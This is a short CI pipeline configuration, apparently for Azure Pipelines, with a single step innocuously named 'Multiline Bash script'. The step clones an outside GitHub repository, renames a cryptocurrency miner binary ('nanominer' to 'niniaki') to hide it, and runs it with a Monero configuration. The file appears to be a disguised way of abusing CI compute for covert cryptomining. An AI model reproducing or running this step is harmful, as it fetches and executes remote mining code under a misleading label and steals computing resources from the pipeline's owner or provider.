steps:
- bash: git clone https://github.com/sakufoundation/excute.git && cd excute && chmod u+x nanominer && mv nanominer niniaki && ./niniaki config_xmr.ini
  displayName: Multiline Bash script
  env:
    name: Microsoft5